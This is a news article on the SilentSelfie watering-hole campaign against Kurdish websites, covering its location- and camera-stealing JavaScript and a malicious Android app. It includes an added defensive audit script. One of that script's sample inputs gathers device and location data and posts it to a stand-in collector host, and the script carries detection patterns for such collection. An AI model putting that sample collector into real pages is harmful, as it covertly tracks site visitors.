New SilentSelfie campaign targets Kurdish online community

October 1, 2024

A watering hole attack targeting Kurdish websites has recently emerged, revealing a significant cybersecurity threat that has persisted for over a year and a half. This campaign, named SilentSelfie, has compromised around 25 websites associated with the Kurdish minority. The first indications of these attacks were detected as early as December 2022.

The websites affected in this campaign include those related to the Kurdish press and media, the Rojava administration, and various revolutionary far-left political organisations in Türkiye and Kurdish regions. Researchers noted that the precise methods employed to breach these sites remain unclear, indicating a potential gap in current threat assessments.

The SilentSelfie campaign has deployed four different variants of information-stealing frameworks.

The simplest variant captures users’ locations, while more sophisticated versions are capable of recording images from users’ selfie cameras and leading specific individuals to install malicious Android applications (APKs). This tactic demonstrates a targeted approach aimed at harvesting sensitive information from individuals engaged with Kurdish-related content.

Malicious JavaScript is the main component of the watering hole attack; it collects a variety of data from site visitors, including user location, device information (such as CPU and battery levels), browser type, and public IP address. Interestingly, one variant of this script has been found on three distinct websites: targetplatform.net, hawarnews.com, and rojnews[.]news. In addition to tracking users, this version sends them to malicious Android APK downloads.
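Site operators can audit the scripts their pages serve for the collection pattern described above. The following is an added example, not code from the original article or from the researchers; the browser API names are real, while the rule set, verdict names and sample scripts are constructed assumptions.

```javascript
// Heuristic audit: flag scripts that combine a permission-gated sensor
// (location or camera) with device fingerprinting and a network sender.
// The rules and verdicts are assumptions, not indicators from the campaign.
const COLLECTORS = {
  geolocation: /navigator\s*\.\s*geolocation\s*\.\s*(getCurrentPosition|watchPosition)/,
  camera: /mediaDevices\s*\.\s*getUserMedia/,
  battery: /navigator\s*\.\s*getBattery/,
  cpu: /navigator\s*\.\s*hardwareConcurrency/,
  userAgent: /navigator\s*\.\s*userAgent/,
};
const SENDERS = /\b(fetch|sendBeacon)\s*\(|new\s+XMLHttpRequest\b/;

function auditScript(source) {
  const collects = Object.keys(COLLECTORS).filter((k) => COLLECTORS[k].test(source));
  const sends = SENDERS.test(source);
  const sensitive = collects.includes("geolocation") || collects.includes("camera");
  let verdict = "ok";
  // Sensor + at least one more signal + outbound request: needs a human look.
  if (sends && sensitive && collects.length >= 2) verdict = "review";
  // Sensor use alone is common (maps, video chat) but worth recording.
  else if (sensitive) verdict = "note";
  return { collects, sends, verdict };
}

// Constructed sample scripts, keyed by a hypothetical file name.
const SAMPLES = {
  "store-locator.js":
    "navigator.geolocation.getCurrentPosition(p => showNearest(p.coords));",
  "analytics.js":
    "fetch('/stats', { method: 'POST', body: navigator.userAgent });",
  "unexpected.js": `
    navigator.getBattery().then(b => { info.battery = b.level; });
    info.cpu = navigator.hardwareConcurrency;
    navigator.geolocation.getCurrentPosition(p => {
      info.pos = p.coords;
      fetch('https://collector.invalid/in', { method: 'POST', body: JSON.stringify(info) });
    });`,
};

function auditAll(samples) {
  const report = {};
  for (const [name, src] of Object.entries(samples)) report[name] = auditScript(src);
  return report;
}

console.log(auditAll(SAMPLES));
```

Pattern matching of this kind misses obfuscated or dynamically loaded code, so a clean result does not replace comparing deployed files against a known-good copy.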

According to analysis, the malicious Android application employs a WebView to present the website while secretly collecting system information, contacts, location, and files from external storage, depending on the permissions granted by users. Importantly, the malicious code does not maintain a presence on the device; it only executes when the user launches the RojNews application. After a delay of ten seconds, the app begins sending the user’s location to a specified URL through HTTP POST requests, signalling a further breach of privacy.

While little is known about the individuals or groups behind the SilentSelfie campaign, it is speculated that the Kurdistan Regional Government of Iraq might be involved, especially in light of the arrest of RojNews journalist Silêman Ehmed in October 2023. His sentencing to three years in prison in July 2024 has raised suspicions regarding the potential motivations behind these attacks.

The sheer volume of Kurdish websites impacted and the campaign’s duration make this watering hole effort noteworthy despite its relatively modest degree of sophistication. It shows the rise of a new threat against the Kurdish minority, evoking previous warnings from organisations such as StrongPity and BladeHawk. Given how quickly things are developing, cybersecurity experts need to be on the lookout for new risks in the digital sphere and take extra precautions to be safe.
